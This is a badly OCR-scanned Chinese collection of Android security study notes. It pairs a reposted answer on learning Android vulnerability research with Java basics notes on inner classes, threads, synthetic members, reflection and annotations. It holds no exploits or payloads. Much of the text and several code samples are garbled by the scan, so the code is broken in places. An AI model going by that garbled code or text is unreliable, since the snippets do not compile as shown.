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Introduction 


Android 安全 笔记 


AIR : JnuSimba/AndroidSecNotes 


此 系列 文章 是 本 人 关于 学 习 Android 安全 时 记录 的 一 些 笔记 ， 部 分 原创 ， 部 分 是 对 网 上 文章 
的 理解 整理 。 如 果 可 以 找到 原始 参考 链接 时 则 会 在 文 末 贴 出 (如 乌云 很 多 链接 已 失效 ， 或 者 
记 不 起 当时 存档 时 的 链接 ) ， 或 者 在 文章 开头 写 上 by xx， 如 有 侵权 请 联系 我 (dameng34 at 
163.com) 删除 或 如 上 reference， 感 谢 在 网 上 共享 知识 的 师傅 们 。 


捐赠 链接 
如 果 觉得 以 下 内 容 对 您 有 一 定 帮助 ， 不 妨 小 额 赞助 我 ， 以 鼓励 我 更 好 地 完善 内 容 列表 。 


QV 微 信 支 付 E 支付 宝 


ALIPAY 


向 simba (** 发 ) 转账 


用 支付 宝 扫 一 扫 付 钱 





f$ Shapp 自动化 审计 
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Bin 文件 审计 














第 三 方 库 检测 
私有 AP 前 坊 检测 
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Manliest 分 析 


iOS App 漏 洞 检测 系统 APK 文 件 分 析 


动态 Hook 模 块 

















自动 化 审计 接口 




















代码 分 析 
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Android App 漏 洞 检测 系统 
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应 用 安全 级 别 评分 


内 核 漏 洞 挖掘 


作者 : Flanker Edward 

链接 : https://www.zhihu.com/question/45548548/answer/105379921 
AR: 

著作 权 归 作者 所 有 ， 转 载 请 联系 作者 获得 授权 。 


Andriod 平 台 漏 洞 也 有 很 多 种 ， 分 为 不 同 的 方向 ， 比 如 内 核 漏 洞 挖 气 / 利 用 ， 用 户 态 高 权限 进程 
漏洞 挖掘 /利用 ， 浏 览 器 漏洞 挖 握 / 沙 箱 逃 选 和 针对 Andriod 自 身 结构 的 漏洞 (权限 洪 漏 、 敏 感 
信息 泄漏 等 ) o 
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(内 核 ， 驱 动 ) ， 以 及 Android 在 Linux 架 构 上 添加 的 各 式 各 样 的 组 件 和 功能 (binder > 
media/graphics subsystem > zygote, chromium/skia 和 最 上 层 的 四 大 金刚 等 ) 。 从 问题 中 的 角 
度 来 讲 ， 对 于 不 熟悉 Windows 平 台 的 初学 者 ， 不 建议 将 大 量 时 间 投 入 到 Windows 平 台 上 的 漏 
洞 利用 学 习 上 ， 因 为 两 个 平台 的 漏洞 虽然 核心 思想 相通 ， 但 具体 到 利用 的 细节 不 太 相 同 。 这 
些 精 力 时 间 投 入 到 Linux 平 台 和 Android 自 身 的 研究 学 习 上 对 于 Android 漏 洞 挖 气 这 个 目的 意义 
更 大 。 并 且 从 实际 的 角度 出 发 ， 业 界 目 前 需要 更 多 的 也 是 Mobile 系 统 方向 上 的 人 才 。 


基础 的 漏洞 类 型 例如 栈 溢出 E HE 出 . 未 初始 化 x OOB S UAF x 条 件 竞 争 /TOCTOU 漏 洞 等 必 
须要 熟练 理解 掌握 ， 这 些 在 各 种 CTF 平 台 上 在 Linux 平 台 下 都 可 以 练习 到 。 但 是 需要 注意 的 一 
点 是 CTF 还 是 和 实际 有 些 区 别 。 例 如 CTF 上 的 堆 溢出 题目 绝 大 部 分 都 基于 dlmalloc， 而 


Android 早 在 5.0 就 切换 到 了 jemalloc。 现 代 软 件 中 最 常见 的 条 件 竞 争 漏洞 因为 比赛 平台 的 限制 
也 很 少 在 CTF 中 看 到 〈 利 用 比较 耗费 资源 ， 很 难 支撑 比赛 中 的 大 规模 并 发 需求 ) 。 


在 了 解 了 基础 知识 之 后 ， 可 以 进一步 学 习 Andriod 自 身 的 体系 结构 。 


e Binder 方 面 可 以 学 习 调 试 几 个 经 典 漏洞 (flankerhqd/mediacodecoob > blackhat) 
e 文件 格式 漏洞 自然 是 经 典 的 stagefright 

e 驱动 /内 核 漏洞 3636 和 1805 

e Chrome V8 相 关 

e 关注 每 个 月 的 android security bulletin, 尝试 从 diff 反 推 漏洞 研究 如 何 触 发 和 利用 

e 代码 审计 : 经 典 书籍 The art of software security assessment 

e fuzzing 


当然 ， 只 要 掌握 了 计算 机 体系 结构 ， 熟 悉 了 程序 的 运作 方式 ， 到 达 一 定 境界 之 后 那么 各 种 漏 
洞 、 各 种 系统 之 间 的 界限 也 就 渐渐 模糊 了 。 我 所 知道 的 业界 人 士 中 有 不 少 从 Windows 大 牛 跨 
界 为 Android 大 牛 ， 例 如 Fireeye 的 王 字 王 老 师 ，pjf 大 牛 。 毕 竞 触 类 旁 通 ， 运 用 之 妙 ， 存 乎 一 
o EX. 


Java 语 言 基 础 


— 


. 类 与 文件 


—^ java 文件 可 以 写 多 个 类 ， 每 个 类 里 面 可 以 有 main 有 函数 ， 一 个 java 文 件 里 面 只 能 有 一 
个 public 类 ， 此 时 java 文件 的 命名 只 能 是 public 类 名 .java。 使 用 javac 编译 一 个 java X: 
件 时 ， 如 果 有 多 个 类 ， 会 生成 多 个 类 名 .class 文件 ，java 类 名 执行 程序 (单元 测试 ) © 
多 个 class 文件 可 以 打包 成 一 个 jar 文件 ，java -jar test.jar 执行 前 需要 设置 一 下 程序 入 
口 ， 即 在 MANIFEST.MF 里 面 添加 如 下 一 句 话 : Main-Class: test.someClassName 

在 Java 中 ， 为 了 组 织 代码 的 方便 ， 可 以 将 功能 相似 的 类 放 到 一 个 文件 夹 内 ， 这 个 文件 
夹 ， 就 叫做 包 。 包 不 但 可 以 包含 类 ， 还 可 以 包含 接口 和 其 他 的 包 。 目录 以 只 来 表示 层级 
关系 ， 例 如 E:\Java\workspace\Demoìbin\p1\p2\Test.java o 包 以 "." 来 表示 层级 关系 ， 例 
如 p1.p2.Test 表示 的 目录 为 \p1\p2\Test.class。 

import 只 能 导入 包 所 包含 的 类 ， 而 不 能 导入 包 。 为 方便 起 见 ， 我 们 一 般 不 导入 单独 的 

类 ， 而 是 导入 包 下 所 有 的 类 ， 例 如 import java.util.*; 


=. X4 


final 


可 以 修饰 类 ， 方 法 和 成 员 变 量 
final 修 饰 的 类 不 能 被 继承 
final 修 饰 的 方法 不 能 被 覆盖 


final 修 饰 的 变量 是 常量 ， 只 能 赋值 一 次 


履 盖 注意 事项 : 
1， 子 类 方法 覆盖 父 类 方法 时 ， 子 类 方法 的 权限 要 >= 父 类 
2. PATERA ARAJ iK 
3. 如 果 父 类 方法 添加 final, 则 子 类 重新 定义 此 方法 会 编译 出 错 
4. 在 子 类 方法 中 可 以 通过 supermethod 调用 父 类 方法 ， 当 然 如 果 父 类 方法 是 private， 也 是 
不 能 调用 的 (实际 上 是 子 类 重新 定义 method， 并 没 有 履 盖 父 类 method， 可 以 认为 父 类 
method 被 隐藏 了 ) 
static 
1. ATZARA ORR ES FORA BRM) ， 被 修饰 后 的 成 员 具 备 以 下 特点 : 


o 随 着 类 的 加 载 而 加 载 ， 随 着 类 的 消失 而 消失 
o 优先 于 对 象 而 存在 

o 被 所 有 对 象 所 共享 

o 可 以 直接 用 类 名 调用 如 类 名 .成 员 


2.， 用 于 修饰 静态 代码 块 static (...) 


o 随 着 类 的 加 载 而 执行 ， 而 且 只 执行 一 次 ， 可 以 用 于 给 类 进行 初始 化 
。 注 : 构造 代码 块 {.} 随 着 对 象 的 构造 而 执行 ， 而 且 创建 几 次 就 执行 几 次 ， 可 以 用 于 给 
所 有 对 象 进行 初始 化 
o 静态 代码 块 -> 构造 函数 {Super()--> 成 员 初 始 化 --> 构 造 代码 块 --> 后 续 语 名 } 
3. 使 用 注意 : 


o 静态 方法 只 能 访问 静态 成 员 
o 静态 方法 中 不 可 以 出 现 this, super 等 关键 字 
o EMA APA AY 


this & super 


this 代 表 本 类 对 象 的 引用 
super 代 表 一 个 父 类 空间 
e 当 本 类 的 成 员 和 局 部 变量 同名 用 this 区 分 
e 当 子 父 类 的 成 员 变 量 同 名 用 Super 区 分 父 类 


interface 


e 当 一 个 抽象 类 中 的 方法 都 是 抽象 的 时 候 ， 这 时 可 以 将 该 抽象 类 用 另 一 种 形式 定义 和 表 
示 ， 就 是 接口 interface. 
e 对 于 接口 中 的 常见 成 员 都 有 固定 的 修饰 符 。 
全 局 常量 : public static final 
抽象 方法 : public abstract 
e 类 与 类 之 间 是 继承 extends 关 系 ; 类 与 接口 之 间 是 实现 implements 关 系 ; 接口 与 接口 之 间 
是 继承 关系 ， 而 且 接口 可 以 多 继承 
类 可 以 在 继承 一 个 类 的 同时 实现 多 个 接口 
抽象 类 的 继承 ， 是 is a 关 系 ， 在 定义 该 体系 的 基本 共性 内 容 ， 接 口 的 实现 是 like a 关 系 ， 在 
定义 体系 额外 功能 
接口 类 型 的 引用 ， 用 于 指向 接口 的 子 类 对 象 
e 抽象 类 可 以 为 部 分 方法 提供 实现 ， 避 免 了 在 子 类 中 重复 实现 这 些 方法 ， 提 高 了 代码 的 可 
重用 性 ， 这 是 抽象 类 的 优势 ; 而 接口 中 只 能 包含 抽象 方法 ， 不 能 包含 任何 实现 。 


三 , 继承 


在 子 类 的 构造 函数 中 第 一 行 有 一 个 默认 的 隐 式 语句 super(); 子 类 中 所 有 的 构造 函数 默认 都 会 
访问 父 类 中 的 空 参数 的 构造 函数 。 

如 果 父 类 中 没有 定义 空 参数 构造 函数 ， 那 么 子 类 的 构造 函数 必须 用 Super(.…) 明 确 要 调用 父 类 
中 哪个 构造 函数 。 


同时 子 类 构造 函数 中 如 果 使 用 this 调 用 了 本 类 构造 函数 时 ， 那 么 Super 语 句 就 没有 了 ， 因 为 
super 和 this 都 只 能 定义 在 第 一 行 ， 所 有 只 能 有 一 个 。 但 是 可 以 保证 的 是 ， 子 类 中 肯定 会 有 其 
他 的 构造 函数 访问 父 类 的 构造 函数 。 


WwW. 多 A 


1 成员 变量 : 
编译 时 : 参考 引用 型 变量 所 属 的 类 中 是 否 有 调用 的 成 员 变 量 ， 如 果 没 有 则 编译 失败 
运行 时 : 参考 引用 型 变量 所 属 的 类 中 是 否 有 调用 的 成 员 变 量 ， 并 运行 该 所 属 类 中 的 成 员 

a 


a 


里 


2. BL BA: 
编译 时 : 参考 引用 类 型 变量 所 属 的 类 中 是 否 有 调用 的 函数 ， 如 果 没 有 则 编译 失败 
运行 时 : 参考 的 是 对 象 所 属 的 类 中 是 否 有 调用 的 函数 
3. 静态 函数 : 
编译 时 : 参考 引用 类 型 变量 所 属 的 类 中 是 否 有 调用 的 静态 方法 
运行 时 : 参考 引用 类 型 变量 所 属 的 类 中 是 否 有 调用 的 静态 方法 
其 实 对 于 静态 方法 ， 是 不 需要 对 象 的 ， 直 接 用 类 名 调用 


五 . 内 部 类 


内 部 类 可 以 直接 访问 外 部 类 中 的 成 员 
外 部 类 要 访问 内 部 类 ， 必 须 建立 内 部 类 的 对 象 


I| 直接 访问 外 部 类 中 的 内 部 类 中 的 成 员 


outer.inner in = new outer().new inner(); 
in.show(); 


I] 如 果 内 部 类 是 静态 的 ， 相 当 于 一 个 外 部 类 


outer.inner in = new outer.inner(); 
in.show(); 


// 如 果 内 部 类 是 静态 的 ， 而 且 成 员 是 静态 的 


outer.inner.function(); 


I| 如 果 内 部 类 中 定义 了 静态 成 员 ， 该 内 部 类 必须 也 是 静态 的 


class Outer 


{ | 
int num = 3; 
class Inner 
{ 
int num = 4; 
void show() 
{ | 
int num = 5; 
System.out.println(Outer.this.num); 
} 
void method() 
new Inner().show(); 
} 
} 


。 局 部 内 部 类 
内 部 类 可 以 放 在 局 部 位 置 
部 类 在 局 部 位 置 上 只 能 访问 局 部 中 被 final 修 饰 的 局 部 变量 
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e 匿名 内 部 类 
前 提 : 内 部 类 必须 继承 或 者 实现 一 个 外 部 类 或 者 接口 。 
匿名 内 部 类 其 实 就 是 一 个 匿名 子 类 对 象 。 
格式 : new 父 类 or 接口 (){ 子 类 内 容 } 


abstract class Demo 


{ 
abstract void show(); 
} 
class Outer 
{ 
int num = 4; 
jie 
class Inner extends Demo 
ji 
void show() 
System.out.println("show ..."+num); 
} 
i 
s7 
public void method() 
{ 
//new Inner().show(); 
/* Demo de = */ new Demo()// 匿 名 内 部 类 。 
void show() 
System.out.println("show ........ " + num); 
J 
} .show(); 
Teh de.show(); 
} 
} 


class InnerClassDemo4 
public static void main(String[] args) 


new Outer().method(); 


注意 : 如 下 做 法 是 错误 的 


Object obj = new Object() 
{ 


public void show() 


{ 
} 


System.out.println("show run"); 


J; 
obj .show( ); 


为 匿名 内 部 类 这 个 子 类 对 象 被 向 上 转型 为 了 Object 类 型 ， 而 Object 类 并 没有 show() 的 实现 


通常 的 使 用 场景 之 一 : 当 函 数 参 数 是 接口 类 型 时 ， 而 且 接口 中 的 方法 不 超过 三 个 ， 可 以 用 医 
名 内 部 类 作为 实际 参数 进行 传递 


interface Inter 


{ 
void show1(); 
void show2(); 


} 


class InnerClassDemo5 


public static void main(String[] args) 


{ 
System.out.println("Hello World!"); 
show(new Inter() 
{ 
public void show1() {} 
public void show2() {} 
35 
} 


public static void show(Inter in) 


in.show1(); 
in.show2(); 


函数 内 容 如 果 抛 出 需要 检测 的 异常 ， 那 么 函数 必须 要 声明 异常 ， 否 则 必须 在 函数 内 用 try catch 
MI > GM AE AM 
如 果 调 用 到 了 声明 异常 的 函数 ， 要 么 try catch 要 么 throws， 否则 编译 失败 
功能 内 容 可 以 解决 用 catch， 解 决 不 了 用 throws 告 诉 调 用 者 ， 由 调用 者 解决 
一 个 功能 如 果 抛 出 了 多 个 异常 ， 那 么 调用 时 必须 有 对 应 多 个 catch 进 行 针对 性 的 处 理 


Ble SL IN. > Exception ž* (AA R) ， 或 者 RuntimeException 类 (运行 时 异常 ) 
子 类 在 覆盖 父 类 方法 时 ， 父 类 的 方法 如 果 抛 出 了 异常 ， 那 么 子 类 的 方法 只 能 抛 出 父 类 的 异常 
或 者 该 异常 的 子 类 

如 果 父 类 抛 出 多 个 异常 ， 那 么 子 类 只 能 抛 出 父 类 异常 的 子 集 。 如 果 父 类 方法 没有 抛 出 异常 ， 
那么 子 类 履 盖 时 绝对 不 能 抛 


七 .访问 权限 


包 与 包 之 间 的 类 进行 访问 ， 被 访问 的 包 中 的 类 必须 是 public 的 ， 被 访问 的 包 中 的 类 的 方法 也 必 
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须 是 public 的 。 


public protected default private 


同一 类 中 Y Mf Y K 

同一 包 中 Y Y Y N 

RRE Y Y N N 

不 同 包 中 Y N N N 
入 .线程 


创建 线程 的 第 一 种 方式 :继承 Thread 类 。 


创建 线程 的 第 二 种 方式 : 实现 Runnable 接 口 。 


1. 定义 类 实现 Runnable 接 口 。 

2. 禾 盖 接口 中 的 run 方 法 ， 将 线程 的 任务 代码 封装 到 run 方 法 中 。 

3. 通过 Thread 类 创建 线程 对 象 ， 并 将 Runnable 接 口 的 子 类 对 象 作为 Thread 类 的 构造 函数 的 
参数 进行 传递 。 为 什么 ? 因为 线程 的 任务 都 封装 在 Runnable 接 口子 类 对 象 的 run 方 法 
中 ， 所 以 要 在 线程 对 象 创 建 时 就 必须 明确 要 运行 的 任务 。 

4. 调用 线程 对 象 的 start 方 法 开启 线程 。 


实现 Runnable 接 口 的 好 处 : 


1， 将 线程 的 任务 从 线程 的 子 类 中 分 离 出 来 ， 进 行 了 单独 的 封装 。 按 照 面向 对 象 的 思想 将 任 
务 的 封装 成 对 象 。 
2. 避免 了 java 单 继承 的 局 限 性 


所 以 ， 创 建 线程 的 第 二 种 方式 较为 常用 


class SubThread extends Thread 
public void run() 
{ 


System.out.println("hahah"); 
} 


} 
SubThread s = new SubThread(); 
s.start(); 


class Thread 


{ 
private Runnable r; 
Thread() 
{ 
} 
Thread(Runnable r) 
this.r = r; 
n 
public void run() 
t 
if(r != null) 
r.run(); 
} 
public void start() 
run(); 
} 
class ThreadImpl implements Runnable 


public void run() 
{ 


} 


ThreadImpl i = new ThreadImpl(); 
Thread t - new Thread(i); 
t.start(); 


System.out.println("runnable run"); 


创建 线程 的 第 三 种 方式 : 通过 Callable 和 Future 创 建 线 程 


1， 创 建 Callable 接 口 的 实现 类 ， 并 实现 call() 方 法 ， 该 call() 方 法 将 作为 线程 执行 体 ， 并 且 有 
返回 值 。 

2. 创建 Callable 实 现 类 的 实例 ， 使 用 FutureTask 类 来 包装 Callable 对 象 ， 该 FutureTask 对 象 
封装 了 该 Callable 对 象 的 call() 方 法 的 返回 值 。 

3. 使 用 FutureTask 对 人 象 作为 Thread 对 象 的 target 创 建 并 启动 新 线程 。 

4. 调用 FutureTask 对 象 的 get() 方 法 来 获得 子 线程 执行 结束 后 的 返回 值 。`… java package 


com.thread; 


import java.util.concurrent.Callable; 
import java.util.concurrent.ExecutionException; 
import java.util.concurrent.Future Task; 


public class CallableThreadTest implements Callable 


{ 


public static void main(String[] args) 


{ 

CallableThreadTest ctt = new CallableThreadTest(); 

FutureTask<Integer> ft = new FutureTask<>(ctt); 

for(int i = 0;i < 100;i++) 

{ 
System.out.println(Thread.currentThread().getName()+" 的 循环 变量 i 的 值 "+I) ; 
if (i==20) 

new Thread(ft, "有 返回 值 的 线程 ") start(); 
} 

} 

try 

{ 

System.out.println(" 子 线程 的 返回 值 : "+ft.get()); 

} catch (InterruptedException e) 

{ 
e.printStackTrace(); 

) catch (ExecutionException e) 

{ 
e.printStackTrace(); 

} 

} 

@Override 

public Integer call() throws Exception 
{ 

int i = 0; 

for(;i<100; i++) 

{ 
System.out.println(Thread.currentThread().getName()+" "+i); 

} 

return 工 ; 


创建 线程 的 三 种 方式 的 对 比 
采用 实现 Runnable、Callable 接 口 的 方式 创见 多 线程 时 优势 是 : 


线程 类 只 是 实现 了 Runnable 接 口 或 Callable 接 口 ， 还 可 以 继承 其 他 类 。 

在 这 种 方式 下 ， 多 个 线程 可 以 共享 同一 个 target 对 象 ， 所 以 非常 适合 多 个 相同 线程 来 处 理 
同一 份 资 源 的 情况 ， 从 而 可 以 将 CPU、 代 码 和 数据 分 开 ， 形 成 清晰 的 模型 ， 较 好 地 体现 
了 面向 对 象 的 思想 。 


BYR: 
编程 稍微 复杂 ， 如 果 要 访问 当前 线程 ， 则 必须 使 用 Thread.currentThread() 方 法 。 
使 用 继承 Thread 类 的 方式 创建 多 线程 时 优势 是 : 


编写 简单 ， 如 果 需 要 访问 当前 线程 ， 则 无 需 使 用 Thread.currentThread() 方 法 ， 直 接 使 用 
this 即 可 获得 当前 线程 。 


劣势 是 : 


Java Basic 


线程 类 已 经 继承 了 Thread 类 ， 所 以 不 能 再 继承 其 他 父 类 。 
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synthetic 的 概念 


According to the JVM Spec: "A class member that does not appear in the source code 
must be marked using a Synthetic attribute." Also, "The Synthetic attribute was 
introduced in JDK release 1.1 to support nested classes and interfaces." 


| know that nested classes are sometimes implemented using synthetic fields and synthetic 
contructors, e.g. an inner class may use a synthetic field to save a reference to its 
outer class instance, and it may generate a synthetic contructor to set that field 
correctly. I'm not sure if it Java still uses synthetic constructors or methods for this, but I'm 
pretty sure | did see them used in the past. | don't know why they might need synthetic 
classes here. On the other hand, something like RMI or java.lang.reflect.Proxy should 
probably create synthetic classes, since those classes don't actually appear in source code. 
| just ran a test where Proxy did not create a synthetic instance, but | believe that's probably 
a bug. 


Hmm, we discussed this some time ago back here. It seems like Sun is just ignoring this 
synthetic attribute, for classes at least, and we should too. 


synthetic 实例 


有 有 synthetic 标记 的 field 和 method 是 class 内 部 使 用 的 ， 正 常 的 源 代 码 里 不 会 出 现 synthetic 
field ° 


下 面 的 例子 是 最 常见 的 synthetic field 


Class pare { 
public void foo() { 
} 
class 
inner() { 
foo(); 
} 
} 


3Estatic4 inner class 里 面 都 会 有 一 个 thisso 的 字段 保存 它 的 父 对 象 。 编 译 后 的 inner class 就 
像 下 面 这 样 : 


class parent$inner 


synthetic parent this$0; 
parent$inner(parent this$0) 


this.this$0 = this$0; 
this$0.foo(); 


所 有 父 对 象 的 非 私 有 成 员 都 通过 thnisso RM > SERENA de FPR o 


public class Outer { // this$0 
public class FirstInner ( // this$1 
public class SecondInner { // this$2 
public class ThirdInner ( 


j 


还 有 许多 用 到 synthetic 的 地 方 ， 比 如 使 用 了 assert 关键 字 的 class 会 有 一 个 
synthetic static boolean $assertionsDisabled 字段 assert condition; 在 class 里 被 编译 
成 : 

if(!$assertionsDisabled && !condition) 

t 

} 


throw new AssertionError(); 


在 jvm 里 所 有 class 的 私有 成 员 都 不 允许 在 其 他 类 里 访问 ， 包 括 它 的 inner class。 在 java 语 言 里 
inner class 是 可 以 访问 父 类 的 私有 成 员 的 ， 在 class 里 是 用 如 下 的 方法 实现 的 : 


class parent 


{ 


private int value = 0; 
synthetic static int access$000(parent obj) 


{ 


return value; 


} 
} 


Æ inner class 里 通过 accesssooo 来 访问 value 字 段 。 


另外 一 个 例子 ， 外 包 类 访问 瞪 套 类 私有 属性 。 


import java.lang.String; 


public class AL 
private static class B{ 
private String b1i="b111"; 
private String b2="b2222"; 


public static void main(String[] args){ 
A.B bznew A.B(); 
String tmp=b.b1; 
String tmpi-b.b2; 
} 
} 


运行 javap -private A.B 输出 如 下 : 


class A$B { 
private java.lang.String b1; 
private java.lang.String b2; 
private A$B(); 
A$B(A$1); 
static java.lang.String access$100(A$B); 
static java.lang.String access$200(A$B); 


生成 了 两 个 synthetic 方 法 ， 分 别 对 应 于 String tmp=b.b1;String tmp1=b.b2; 访 问 两 个 私有 属 
小 o 


原文 by efany 


Java 的 反射 机 制 


JAVA 反射 机 制 是 在 运行 状态 中 ， 对 于 任意 一 个 类 ， 都 能 够 知道 这 个 类 的 所 有 属性 和 方法 ; 对 
于 任意 一 个 对 象 ， 都 能 够 调用 它 的 任意 一 个 方法 ; 这 种 动态 获取 信息 以 及 动态 调用 对 外 的 方 
法 的 功能 称 为 java 语 言 的 反射 机 制 。 

用 处 : 

1) 在 运行 时 判断 任意 一 个 对 象 所 属 的 类 ; 


2) 在 运行 时 构造 任意 一 个 类 的 对 象 ; 
3) 在 运行 时 判断 任意 一 个 类 所 具有 的 成 员 变 量 和 方法 ; 
4) 在 运行 时 调用 任意 一 个 对 象 的 方法 ; 

5) 生成 动态 代理 。 


比如 像 下 面 代码 : 


// 获 取 类 

Class c = Class.forName("java.lang.String"); 

// 获取 所 有 的 属性 

Field[] fields = c.getDeclaredFields(); 

StringBuffer sb = new StringBuffer(); 

sb.append(Modifier.toString(c.getModifiers()) + " class " + c.getSimpleName() + "{\n") 


// 遍历 每 一 个 属性 
for (Field field : fields) { 
sb.append("\t");// 空格 
sb.append(Modifier.toString(field.getModifiers()) * " ");// 获得 属性 的 修饰 符 ， 例 如 publ 
ic’ statics + 
sb.append(field.getType().getSimpleName() + " ");// 属性 的 类 型 的 名 字 
sb.append(field.getName() + ";\n");// 属性 的 名 字 + 回 车 


} 
sb.append("}\n"); 
System.out.println(sb); 


就 可 以 获得 String ， 这 个 我 们 常用 类 的 所 有 属性 
public final class String{ 
private final char[] value 
rivate int hash 


atic final long serialVersionUID 


static final ObjectStreamField[] serialPersistentFields 


c static final Comparator CASE INSENSITIVE ORDER 





PEE fields = object.getClass().getDeclaredFields(); 
这 身 代 码 的 意思 就 是 getClass 获 得 类 ， 然 后 getDeclaredFields 获 得 类 中 的 所 有 属性 
类 似 的 方法 有 


getName() : 获得 类 的 完整 名 字 。 

getFields(): 获得 类 的 public 类 型 的 属性 。 

getDeclaredFields() : 获得 类 的 所 有 属性 。 

getMethods() : 获得 类 的 public 类 型 的 方法 。 

getDeclaredMethods() : 获得 类 的 所 有 方法 。 

getMethod(String name, Class[] parameterTypes) : 获得 类 的 特定 方法 ，name 参 数 指定 方法 的 名 字 ，par 
ameterTypes 参 数 指定 方法 的 参数 类 型 。 

getConstructors() : 获得 类 的 public 类 型 的 构造 方法 。 


3h 但 


getConstructor(Class[] parameterTypes) : 获得 类 的 特定 构造 方法 ，parameterTypes 参 数 指定 构造 方法 
的 参数 类 型 。 
newInstance() : 通过 类 的 不 带 参数 的 构造 方法 创建 这 个 类 的 一 个 对 象 。 


Method method = activityClass.getMethod("setContentView", int.class); 
method.invoke(activity, layoutId); 


getMethod 中 的 第 一 个 参数 是 methodname， 第 二 个 参数 是 参数 类 型 集合 ， 通 过 这 两 个 参数 得 
到 要 执行 的 Method。 

method.invoke 中 的 第 一 个 参数 是 执行 这 个 方法 的 对 象 ， 第 二 个 参数 是 方法 参数 。 执 行 该 
Method.invoke 方 法 的 参数 是 执行 这 个 方法 的 对 象 OWwner， 和 参数 数组 args。 可 以 这 么 理解 : 
Owner 对 象 中 带 有 参数 args 的 method 方 法 ， 返 回 值 是 Object， 也 即 是 该 方法 的 返回 值 。 在 此 基 
础 上 还 有 


public Object invokeMethod(Object owner, String methodName, Object[] args) throws Exce 
ption { 


Class ownerClass = owner.getClass(); 
Class[] argsClass = new Class[args.length]; 
for (int i = 0, j = args.length; i < j; i++) { 
argsClass[i] = args[i].getClass(); 
} 
Method method = ownerClass.getMethod(methodName,argsClass); 


return method.invoke(owner, args); 


} 
public Object invokeStaticMethod(String className, String methodName, 
Object[] args) throws Exception { 

Class ownerClass = Class.forName(className) ; 

Class[] argsClass = new Class[args.length]; 

for (int i = 0, j = args.length; i < j; i++) { 

argsClass[i] = args[i].getClass(); 
} 
Method method = ownerClass.getMethod(methodName, argsClass) ; 


return method.invoke(null, args); 


原理 就 是 调用 getMethod 和 method.invoke。 
Java 中 有 关 反 射 的 类 有 以 下 这 几 个 : 


java.lang.Class 编译 后 的 class 文件 的 对 象 
java.lang.reflect.Constructor 构造 方法 
java.lang.reflect.Field 类 的 成 员 变量 〈 属 性 ) 
java.lang.reflect .Method 类 的 成 员 方法 
java.lang.reflect .Modifier 判断 方法 类 型 
java.lang.annotation.Annotation 类 的 注解 


Java 注解 


Annotation (注解 ) 就 是 Java 提 供 了 一 种 源 程序 中 的 元 素 关联 任何 信息 或 者 任何 元 数据 
(metadata) 的 途径 和 方法 。 

Annotation 是 被 动 的 元 数据 ， 永 远 不 会 有 主动 行为 ， 所 以 我 们 需要 通过 使 用 反射 ， 才 能 让 我 们 
的 注解 产生 意义 ， 即 使 用 反射 获取 注解 信息 。 

相信 大 家 对 于 这 行 代码 很 熟悉 了 


@Override 
但 是 肯定 很 多 人 都 只 是 知道 这 行 代码 是 重 写 父 类 方法 的 时 候 会 用 到 ， 但 并 不 知道 它 是 什么 。 
其 实 这 就 是 一 种 注解 ， 可 以 理解 成 它 标识 了 变量 或 者 方法 的 某 种 属性 。 

么 看 看 它 的 具体 实现 


QTarget(ElementType.METHOD) 
@Retention(RetentionPolicy.SOURCE) 
public @interface Override { 


} 


根据 上 面 这 些 信 息 我 们 得 出 这 几 个 问题 


1) 关键 字 @interface : @interface 是 Java 中 表示 声明 一 个 注解 类 的 关键 字 。 使 用 @interface 表 
示 我 们 已 经 继承 了 java.lang.annotation.Annotation 类 ， 这 是 一 个 注解 的 基 类 接口 。2) 注解 再 

次 被 注解 ; 注解 的 注解 叫做 元 注解 包括 @Retention: 定义 注解 的 保留 策略 ; @Target : 定义 注 
解 的 作用 目标 ; @Document : 说 明 该 注解 将 被 包含 在 javadoc 中 : @lnherited : 说 明子 类 可 

以 继承 父 类 中 的 该 注解 四 种 。 

3) 注解 的 注解 里 面 的 参数 


@Retention(RetentionPolicy .SOURCE)// 注 解 仅 7 
CRE Cen ta On ee TOY CLASS)// RU 





Oe RUNTIME)// 注解 会 在 Class 字 节 码 文件 中 存在 ， 在 运行 时 可 以 通过 反射 获取 型 


@Target(ElementType. TYPE) // 接 口 、 类 、 枚 举 、 注 解 
@Target(ElementType.FIELD) // 字 上 段 、 枚 举 的 
QTarget(ElementType.METHOD) //7 x 
@Target(ElementType.PARAMETER) //7:iX 4X 
QTarget(ElementType.CONSTRUCTOR) // 
QTarget(ElementType.LOCAL VARIABLE)// z 
@Target (ElementType.ANNOTATION_TYPE) //%=/# 
@Target(ElementType.PACKAGE) /// 包 












Android 中 的 注解 


之 前 我 们 获取 控件 使 用 的 是 这 样 的 代码 

TextView text = (TextView) findViewById(R.id.text); 

当 我 们 的 布局 比较 复杂 的 时 候 ， 获 取 榨 件 的 代码 就 得 写 好 长 ， 而 且 都 是 重复 的 。 这 时 候 注 解 
式 绑 定 就 应 运 而 生 了 ， 比 如 XUtils 框 架 等 就 实现 了 这 些 功能 。 

通过 注解 实现 setContentView 、findViewByld、setOnClickListener 


代码 实现 : 
MainActivity.java 


@ContentView(id = R.layout.activity_main) 
public class MainActivity extends AppCompatActivity implements View.OnClickListener{ 
@ViewInject(id = R.id.buttoni,clickable = true) 
private Button button1; 
@ViewInject(id = R.id.button2) 
private Button button2; 
@Override 
protected void onCreate(Bundle savedInstanceState) { 
super .onCreate(savedInstanceState) ; 
AnnotateUtils.inJect(this); 
buttoni.setText("button1"); 
button2.setText("button2"); 


} 


@Override 
public void onClick(View v) { 
switch (v.getId()){ 
case R.id.button1: 
Toast.makeText(MainActivity.this, "buttoni", Toast.LENGTH SHORT).show( 


break; 


逻辑 实现 

1) 编写 两 个 类 Override 的 Annotation:ContentView、Viewlnject 

2) 编写 一 个 AnnoteUtils 类 用 来 检测 添加 了 注解 的 类 、 变 量 、 方 法 ， 并 且 根 据 值 执行 对 应 的 操 
作 。 

代码 实现 


ContentView.java 


QTarget(ElementType.TYPE) 
QRetention(RetentionPolicy.RUNTIME) 
public @interface CODE Soy Tew, { 

int id();//layout % 
} 


Emon Type: TYPE 表 示 着 这 个 注解 作用 于 类 ; RetentionPolicyRUNTIME 表 示 这 个 注解 在 运 
行 时 可 以 通过 反射 获取 到 


Viewlnject.java 


QTarget(ElementType.FIELD) 
QRetention(RetentionPolicy.RUNTIME) 
public Qinterface ViewInject { 

int id();//4£ffid 

boolean clickable() default false; 


ElementType.TYPE 表 示 着 这 个 注解 作用 于 字段 ; 


AnnotateUtils.java 


public class AnnotateUtils { 


private static void injectViews(Object object, View sourceView)( 
Field[] fields - object.getClass().getDeclaredFields(); 
for (Field field : fields){ 
ViewInject viewInject - field.getAnnotation(ViewInject.class); 
if(viewInject != null)( 
int viewId - viewInject.id(); 
